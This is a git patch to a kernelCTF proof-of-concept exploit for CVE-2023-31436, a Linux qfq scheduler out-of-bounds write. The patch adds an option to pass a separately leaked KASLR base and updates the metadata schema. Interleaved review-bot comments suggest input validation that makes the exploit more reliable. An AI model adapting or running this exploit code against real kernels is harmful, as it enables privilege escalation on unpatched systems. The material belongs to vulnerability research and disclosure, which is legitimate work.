From d87bad353a0350a76e7fbaa55921fa57fec0e3be Mon Sep 17 00:00:00 2001
From: liona24
Date: Mon, 18 Sep 2023 10:08:46 +0200
Subject: [PATCH] Add option to use separate kaslr leak
---
 .../exploit/mitigation-6.1/exploit.c | 16 ++++++++++++++--
 .../CVE-2023-31436_mitigation/metadata.json | 12 ++++++------
 2 files changed, 20 insertions(+), 8 deletions(-)
diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c
index 74c925ed..88ce252f 100644
--- a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c
@@ -955,13 +955,25 @@ int bug_worker(void* arg) {
 }
 }
-int main() {
+int main(int argc, char* argv[]) {
 // main orchestration routine.
 // Hopefully less noise due to thread creation
 FAIL_IF(_pin_to_cpu(1) != 0);
- FAIL_IF(get_kernel_base() < 0);
+ if (argc == 2) {
+ u64 base = strtoull(argv[1], NULL, 16);
+ L("using supplied kernel base: %llx", base);
+ u64 diff = base - 0xffffffff80000000ull;
+ L("diff: %llx", diff);
+ #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); }
+ FOR_ALL_OFFSETS(__x);
+ #undef __x
+ } else {
+ FAIL_IF(get_kernel_base() < 0);
+ }
+
 payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
 FAIL_IF(payload == MAP_FAILED);
diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json
index 7018e6cb..25dfabd6 100644
--- a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json
+++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json
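Review bot: The supplied base in the new `if (argc == 2)` block is never validated: `strtoull(argv[1], NULL, 16)` returns 0 for a non-hex argument and silently accepts trailing garbage, so a mistyped leak makes `diff` wrap to `0 - 0xffffffff80000000` and every offset in FOR_ALL_OFFSETS is slid to a bogus address before the exploit starts writing kernel memory. Parse with an end pointer and errno (add `<errno.h>` if the file does not already include it), and reject a base below the unrelocated image base; if this target is x86-64, as the 0xffffffff80000000 constant suggests, KASLR slides the text in 2 MiB steps, so a base with `(base & 0x1fffff) != 0` cannot be a real leak either. I would also fail loudly when argc is neither 1 nor 2 rather than silently falling back to get_kernel_base(), and rename `__x`, since double-underscore identifiers are reserved for the implementation. The sketch below assumes FAIL_IF aborts the run as it appears to for the other checks here; main's body continues past the end of the hunk.

```c
    if (argc == 2) {
        char *end = NULL;
        errno = 0;
        u64 base = strtoull(argv[1], &end, 16);
        // Reject empty/garbage input and overflow, then a base that cannot be a
        // relocated kernel image (below the unslid base, or not 2 MiB aligned).
        FAIL_IF(end == argv[1] || *end != '\0' || errno == ERANGE);
        FAIL_IF(base < 0xffffffff80000000ull || (base & 0x1fffffull) != 0);
        L("using supplied kernel base: %llx", base);
        // … unchanged: diff computation and FOR_ALL_OFFSETS correction …
    } else {
        FAIL_IF(argc != 1);  // usage: exploit [kernel_base_hex]
        FAIL_IF(get_kernel_base() < 0);
    }
```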
@@ -1,5 +1,5 @@
 {
- "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v2.json",
+ "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
 "submission_ids": ["exp52"],
 "vulnerability": {
 "summary": "qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.",
@@ -14,11 +14,11 @@
 ]
 }
 },
- "exploits": [
- {
- "environment": "mitigation-6.1",
+ "exploits": {
+ "mitigation-6.1": {
 "uses": ["userns"],
- "stability_notes": "5% success rate"
+ "stability_notes": "5% success rate",
+ "requires_separate_kaslr_leak": true
 }
- ]
+ }
 }
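Review bot: `stability_notes` still reads `5% success rate` while the newly added `"requires_separate_kaslr_leak": true` means the exploit now has two modes (its own leak versus a caller-supplied base), so a reader cannot tell which mode that figure measures. If the 5% was measured with the built-in leak, qualify it, e.g. `"stability_notes": "5% success rate (measured with the built-in kaslr leak)"`, and add the figure for the supplied-base mode once it has been measured rather than guessing at it. The `$schema` bump to v3 presumably introduces the keyed `exploits` object and the new flag; if the schema also defines a field for documenting how the base is passed, that would be the place to record the argv[1] convention.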